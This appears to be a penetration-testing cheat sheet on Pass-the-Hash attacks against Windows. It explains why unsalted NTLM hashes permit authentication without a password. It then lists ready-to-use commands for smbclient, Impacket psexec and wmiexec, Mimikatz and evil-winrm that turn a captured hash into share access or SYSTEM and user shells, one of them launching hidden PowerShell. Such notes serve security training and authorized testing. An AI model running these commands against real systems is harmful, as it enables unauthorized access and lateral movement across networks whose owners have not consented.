- PtH is a techique where a valid combination of username and a NTLM hash will authenticate a user. This is without a plaintext password.
- It is possible because NTLM/LM hashes are not salted and remain static between sessions.
- They can even be used to authenticate to another machine with the same user and password.
- Note: The targeted user most often needs to be Administrator, or be configured in a certain way to obtain successful code execution. This is a thing since Windows Vista.
- PtH can be performed against protocols that support authentication with NTLM hashes, such as: SMB, RDP, WinRM.
- Tools which can perform PtH include: smbclient, CrackMapExec, psexec.py (Impacket), and Mimikatz.
PtH Attack with SMBClient:
smbclient \\\\192.168.X.X\\secrets -U Administrator --pw-nt-hash <hash>
PtH NT_AUTHORITY Shell with PSExec:
- PSExec searches for a writable share and uploads an executable to it. The executable then registers as a Windows service and starts running, resulting in a shell always as SYSTEM.
- If not command is specified to be run in the end a cmd-shell will spawn instead.
- Hash arguments are read as LMHash:NTHash. If only one of them is used fill the other with 32 0's.
- Example which will spawn a shell from a NTLM hash:
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.X.X
PtH User Shell with WMIExec:
- Obtains a shell as the user used for authentication and not SYSTEM.
- Example:
impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.X.X
PtH with Mimikatz:
mimikatz sekurlsa::pth /user:Administrator /domain:. /ntlm:… /run:”powershell -w hidden”
Alt.
mimikatz sekurlsa::pth /user:Administrator /domain:. /ntlm:…
.\PsExec.exe \\172.23.1.100 cmd.exe
PtH with Evil-WinRM:
evil-winrm -i 192.168.X.X -u <user> -H <ntlm-hash>